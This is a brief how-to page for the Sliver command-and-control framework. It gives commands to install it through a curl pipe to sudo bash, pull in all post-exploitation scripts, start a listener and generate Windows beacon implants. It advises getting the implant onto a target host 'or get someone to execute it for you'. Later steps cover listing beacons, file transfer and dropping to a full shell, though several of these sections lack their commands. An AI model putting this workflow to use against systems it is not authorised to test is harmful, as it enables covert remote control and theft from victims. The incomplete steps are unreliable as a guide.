Sliver

Install

curl https://sliver.sh/install|sudo bash and then run sliver

Install the armory

This will install all the third party post exploitation scripts.

sliver > armory install all

Start a listener

sliver > https local-ip-address --lhost -D

Generate beacons

This creates an executable that can be launched on the platform of choice.

sliver > generate beacon --http http://local-ip-address --os windows --save local-path-for-executable

Execute beacons

Get the executable file you just created, get it to your target user or host and execute it (or get someone to execute it for you) – you’ll see a call back and a beacon entry show up in the beacons list.

List beacons

sliver > beacons

 ID         Name               Transport   Username   Operating System   Last Check-In   Next Check-In 
========== ================== =========== ========== ================== =============== ===============
 d97fcc0b   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        1h12m2s         1h10m47s      
 7fae33ed   UGLIEST_FAMILIAR   http(s)     op1user    linux/amd64        43m42s          42m19s        
 d2355aee   UGLIEST_FAMILIAR   http(s)     op2user    linux/amd64        29m59s          28m50s        
 aedc2bbd   UGLIEST_FAMILIAR   http(s)     op3user      linux/amd64        29m44s          28m34s        
 6f3596af   UGLIEST_FAMILIAR   http(s)     root       linux/amd64        38s             36s

Use beacons

In order to set the current context to a particular beacon, I use the generated ID from the listing above. The prompt will change to contain the name of the selected beacon one it’s set as your active one. You can now issue commands.

Show task list

You can see the status of currently queued and completed tasks issued to a beacon as below:

Recall task output

You can re-review the output for a task and get more information about it using fetch and the task’s ID number.

Upload/download a file using beacons

Prepare interactive session

List interactive sessions

Switch to interactive sessions

Using the session ID from above, we will use the familiar from meterpreter/metasploit sessions -i. The prompt will change colors to red once this is complete.

Switch to full shell

Once in an interactive session, you can drop to a full purpose shell.

Last updated